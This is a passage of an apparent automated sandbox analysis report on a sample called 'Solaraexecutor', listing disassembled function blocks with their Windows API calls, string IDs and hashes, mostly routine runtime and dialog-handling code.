                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                      • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                      • API String ID: 797121971-1840816070
                                                      • Opcode ID: 962c55a2fcddb09a52f8f746b0045e0e4bdaab900f33cea999feb8c71f36118a
                                                      • Instruction ID: 2eea3125ff1f267efe1de4e8d8cca68c06a021df60e0e3fed79b8913d0afdbf4
                                                      • Opcode Fuzzy Hash: 962c55a2fcddb09a52f8f746b0045e0e4bdaab900f33cea999feb8c71f36118a
                                                      • Instruction Fuzzy Hash: 5791C472258344BFD221DBA0DC49FFB77ACEB49B45F044819FA89D6181EB71EA048772
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 00D26FAA
                                                      • _wcslen.LIBCMT ref: 00D27013
                                                      • _wcslen.LIBCMT ref: 00D27084
                                                        • Part of subcall function 00D27A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D27AAB
                                                        • Part of subcall function 00D27A9C: GetLastError.KERNEL32 ref: 00D27AF1
                                                        • Part of subcall function 00D27A9C: CloseHandle.KERNEL32(?), ref: 00D27B00
                                                        • Part of subcall function 00D2A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00D2977F,?,?,00D295CF,?,?,?,?,?,00D52641,000000FF), ref: 00D2A1F1
                                                        • Part of subcall function 00D2A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00D2977F,?,?,00D295CF,?,?,?,?,?,00D52641), ref: 00D2A21F
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00D27139
                                                      • CloseHandle.KERNEL32(00000000), ref: 00D27155
                                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00D27298
                                                        • Part of subcall function 00D29DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00D273BC,?,?,?,00000000), ref: 00D29DBC
                                                        • Part of subcall function 00D29DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00D29E70
                                                        • Part of subcall function 00D29620: CloseHandle.KERNELBASE(000000FF,?,?,00D295D6,?,?,?,?,?,00D52641,000000FF), ref: 00D2963B
                                                        • Part of subcall function 00D2A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D2A325,?,?,?,00D2A175,?,00000001,00000000,?,?), ref: 00D2A501
                                                        • Part of subcall function 00D2A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D2A325,?,?,?,00D2A175,?,00000001,00000000,?,?), ref: 00D2A532
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                      • API String ID: 3983180755-3508440684
                                                      • Opcode ID: 268fabf9fd670dff6e9a14d27d92e283a72e285cd7533b7d00b48463501cfaaf
                                                      • Instruction ID: 839c9e66c8835952510eddbe04b61b3e5848f92bef3e00fd0ddfbfab2c73b6e2
                                                      • Opcode Fuzzy Hash: 268fabf9fd670dff6e9a14d27d92e283a72e285cd7533b7d00b48463501cfaaf
                                                      • Instruction Fuzzy Hash: DBC1E671904324ABDB31DB74EC41FEEB7A8EF28308F044559F956E7282D730AA488B71
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D3F844
                                                      • IsDebuggerPresent.KERNEL32 ref: 00D3F910
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D3F930
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00D3F93A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                      • String ID:
                                                      • API String ID: 254469556-0
                                                      • Opcode ID: 78044c1c28e409422ece5398132101984de1a88606c803c168e9ac0bdfdaa622
                                                      • Instruction ID: feb3b900eadd781db51dc1910c3edd9e2b3c14be72f950b555ce24b8c93669e2
                                                      • Opcode Fuzzy Hash: 78044c1c28e409422ece5398132101984de1a88606c803c168e9ac0bdfdaa622
                                                      • Instruction Fuzzy Hash: 9E312775D0531D9BDB21DFA4D989BCCBBB8AF08304F1040AAE40CAB250EB719B848F64
                                                      APIs
                                                      • VirtualQuery.KERNEL32(80000000,00D3E5E8,0000001C,00D3E7DD,00000000,?,?,?,?,?,?,?,00D3E5E8,00000004,00D81CEC,00D3E86D), ref: 00D3E6B4
                                                      • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00D3E5E8,00000004,00D81CEC,00D3E86D), ref: 00D3E6CF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: InfoQuerySystemVirtual
                                                      • String ID: D
                                                      • API String ID: 401686933-2746444292
                                                      • Opcode ID: 5357a2921cb3f0087c1fa494312a9e9b5378a156dfd24b06957933ff49376bd8
                                                      • Instruction ID: b55c8de80152e28a2cac6cbf3ea9d4611a33868615737359faeaca4e37d3c384
                                                      • Opcode Fuzzy Hash: 5357a2921cb3f0087c1fa494312a9e9b5378a156dfd24b06957933ff49376bd8
                                                      • Instruction Fuzzy Hash: 7D01F7726002096BDB14DF29DC49BDD7BAAAFC4324F0CC120ED19D7290DA34DD0586A0
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00D48FB5
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00D48FBF
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00D48FCC
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: bb1609005e59fb38e157cf34846eba7390bcf7d6a5c42bd71ca9964528cc44c4
                                                      • Instruction ID: aebcd117f6acf651f43d661d479759aa83cf757accba35def8cd05bd2a44b351
                                                      • Opcode Fuzzy Hash: bb1609005e59fb38e157cf34846eba7390bcf7d6a5c42bd71ca9964528cc44c4
                                                      • Instruction Fuzzy Hash: C331B77590131C9BCB21DF64D889B9DBBB4EF08350F5041EAE81CA6250EB709F858F64
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D3AF35
                                                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,00D5E72C,?,?), ref: 00D3AF84
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: FormatInfoLocaleNumber
                                                      • String ID:
                                                      • API String ID: 2169056816-0
                                                      • Opcode ID: e079c908ab302bbd833bab99734867586424bf1eddccaa80f7a693f25a2f8e3c
                                                      • Instruction ID: 8070c32c9688f0d505365349cb04dc7c14d1c55c00a76792ed8a996b88839df1
                                                      • Opcode Fuzzy Hash: e079c908ab302bbd833bab99734867586424bf1eddccaa80f7a693f25a2f8e3c
                                                      • Instruction Fuzzy Hash: 0C015E3A100308AAD7119F74DC45F9A77B8EF08751F104022FE09D7251E3709A248BB5
                                                      APIs
                                                      • GetLastError.KERNEL32(00D26DDF,00000000,00000400), ref: 00D26C74
                                                      • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00D26C95
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      • Opcode ID: ed545c1fd50c6e2cd7013398b01b7e93866b7c9406c504333c032cb4bfa02544
                                                      • Instruction ID: 188217dc1bef2c923be9d0866a1092e833eae9b1c8c70a14153c52bbdbb469e6
                                                      • Opcode Fuzzy Hash: ed545c1fd50c6e2cd7013398b01b7e93866b7c9406c504333c032cb4bfa02544
                                                      • Instruction Fuzzy Hash: AFD05230244300BAEA011E219C06F2A2B98AB50B82F28C004BA80E80E0CA70C820A638
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D3F66A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: FeaturePresentProcessor
                                                      • String ID:
                                                      • API String ID: 2325560087-0
                                                      • Opcode ID: b8376ddbe548f12aa3fed611ff4595600bb92c059e64625bf55e303a932d23a2
                                                      • Instruction ID: bad376ae2621c7198e02c7bf45bea7d68606615973d8cebdc8723f6c29714ef2
                                                      • Opcode Fuzzy Hash: b8376ddbe548f12aa3fed611ff4595600bb92c059e64625bf55e303a932d23a2
                                                      • Instruction Fuzzy Hash: CB515BB1D107099FDB28CF55E9857AABBF8FB48354F28852AD801EB350D374A905CB70
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 00D2B16B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Version
                                                      • String ID:
                                                      • API String ID: 1889659487-0
                                                      • Opcode ID: 108b5772210ed76c7016a4383c5e9c840787eb13b63a78c587fcc9100267eb81
                                                      • Instruction ID: 084d8c495b6b353646765e05c8a33692e2c176449cda2590b44528b3be6fd9c8
                                                      • Opcode Fuzzy Hash: 108b5772210ed76c7016a4383c5e9c840787eb13b63a78c587fcc9100267eb81
                                                      • Instruction Fuzzy Hash: 09F01DB8D003588FDB18DF18EC916DA73B1E75831AF144295D915D3390C7B0AA84CE70
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00D3F3A5), ref: 00D3F9DA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: a9c0370b9b23c63610a28fb0ad3f9689403aeeae46ba6b6528bbd3fae0d56732
                                                      • Instruction ID: 25ecaf05575c3105b7211584622e3e496252d6f1387516ff7e3ed01657244194
                                                      • Opcode Fuzzy Hash: a9c0370b9b23c63610a28fb0ad3f9689403aeeae46ba6b6528bbd3fae0d56732
                                                      • Instruction Fuzzy Hash:
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: HeapProcess
                                                      • String ID:
                                                      • API String ID: 54951025-0
                                                      • Opcode ID: b43d94e3a064be5c868d2b3e5a654d0366503c25fe577cfc6dda450e2d7180a4
                                                      • Instruction ID: 360d14981f5df24067682cdd988e3c117b24424f7c7313be0fe28835ea8538a4
                                                      • Opcode Fuzzy Hash: b43d94e3a064be5c868d2b3e5a654d0366503c25fe577cfc6dda450e2d7180a4
                                                      • Instruction Fuzzy Hash: 3AA02230202300CFC300CF30AF0EB0C3BE8AE003E2308002AA808C0330FF3080A0AB20
                                                      APIs
                                                      • _swprintf.LIBCMT ref: 00D2E30E
                                                        • Part of subcall function 00D24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D240A5
                                                        • Part of subcall function 00D31DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D61030,00000200,00D2D928,00000000,?,00000050,00D61030), ref: 00D31DC4
                                                      • _strlen.LIBCMT ref: 00D2E32F
                                                      • SetDlgItemTextW.USER32(?,00D5E274,?), ref: 00D2E38F
                                                      • GetWindowRect.USER32(?,?), ref: 00D2E3C9
                                                      • GetClientRect.USER32(?,?), ref: 00D2E3D5
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00D2E475
                                                      • GetWindowRect.USER32(?,?), ref: 00D2E4A2
                                                      • SetWindowTextW.USER32(?,?), ref: 00D2E4DB
                                                      • GetSystemMetrics.USER32(00000008), ref: 00D2E4E3
                                                      • GetWindow.USER32(?,00000005), ref: 00D2E4EE
                                                      • GetWindowRect.USER32(00000000,?), ref: 00D2E51B
                                                      • GetWindow.USER32(00000000,00000002), ref: 00D2E58D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                      • String ID: $%s:$CAPTION$d
                                                      • API String ID: 2407758923-2512411981
                                                      • Opcode ID: 663f063279028e24746084e103423e08fe9ee25958b76e96ceccda69992460d5
                                                      • Instruction ID: 4807ada90e6c352204991aa4b5b00b60c2b0a97692afe8fa0f2d2b6153393c4b
                                                      • Opcode Fuzzy Hash: 663f063279028e24746084e103423e08fe9ee25958b76e96ceccda69992460d5
                                                      • Instruction Fuzzy Hash: DB819272108311AFD710DF68DD89E6FBBE9EBC8B08F04091DFA88D7250D634E9058B62
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 00D4CB66
                                                        • Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C71E
                                                        • Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C730
                                                        • Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C742
                                                        • Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C754
                                                        • Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C766
                                                        • Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C778
                                                        • Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C78A
                                                        • Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C79C
                                                        • Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C7AE
                                                        • Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C7C0
                                                        • Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C7D2
                                                        • Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C7E4
                                                        • Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C7F6
                                                      • _free.LIBCMT ref: 00D4CB5B
                                                        • Part of subcall function 00D48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?), ref: 00D48DE2
                                                        • Part of subcall function 00D48DCC: GetLastError.KERNEL32(?,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?,?), ref: 00D48DF4
                                                      • _free.LIBCMT ref: 00D4CB7D
                                                      • _free.LIBCMT ref: 00D4CB92
                                                      • _free.LIBCMT ref: 00D4CB9D
                                                      • _free.LIBCMT ref: 00D4CBBF
                                                      • _free.LIBCMT ref: 00D4CBD2
                                                      • _free.LIBCMT ref: 00D4CBE0
                                                      • _free.LIBCMT ref: 00D4CBEB
                                                      • _free.LIBCMT ref: 00D4CC23
                                                      • _free.LIBCMT ref: 00D4CC2A
                                                      • _free.LIBCMT ref: 00D4CC47
                                                      • _free.LIBCMT ref: 00D4CC5F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 2ed0412f5df3ab7311bda6b0d043171f544204b451458a95291b14fafbcd47e5
                                                      • Instruction ID: 15e04b5c57d1667174502a764ba43a769bb6f1941780753ee9f83e5e87b91c3b
                                                      • Opcode Fuzzy Hash: 2ed0412f5df3ab7311bda6b0d043171f544204b451458a95291b14fafbcd47e5
                                                      • Instruction Fuzzy Hash: 22315E31A123059FEB61AA79D886B5A77E9EF10350F186429F598D71A2DF31EC40DF30
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00D39736
                                                      • _wcslen.LIBCMT ref: 00D397D6
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00D397E5
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00D39806
                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D3982D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                      • API String ID: 1777411235-4209811716
                                                      • Opcode ID: 064d6bede741d125fdcccccc9db94f6a65b3313a6f182108d1835f74e76978b1
                                                      • Instruction ID: d49f2463ed10754795eefc5280ded166a4532d64c1a1ed9020ca87573f3df70f
                                                      • Opcode Fuzzy Hash: 064d6bede741d125fdcccccc9db94f6a65b3313a6f182108d1835f74e76978b1
                                                      • Instruction Fuzzy Hash: A8314A321093017FE725AF34DC06FAFB798DF82721F19051DF902961D2EBA49A4983B6
                                                      APIs
                                                      • GetWindow.USER32(?,00000005), ref: 00D3D6C1
                                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 00D3D6ED
                                                        • Part of subcall function 00D31FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00D2C116,00000000,.exe,?,?,00000800,?,?,?,00D38E3C), ref: 00D31FD1
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00D3D709
